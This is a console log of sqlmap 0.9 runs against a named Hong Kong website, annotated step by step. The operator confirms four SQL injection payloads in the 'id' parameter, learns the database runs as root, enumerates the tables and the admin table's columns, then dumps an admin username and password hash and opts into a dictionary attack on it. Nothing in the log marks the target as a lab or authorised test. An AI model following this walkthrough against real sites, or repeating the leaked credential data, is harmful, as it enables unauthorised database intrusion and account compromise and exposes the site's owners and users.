D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the name of the current user

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>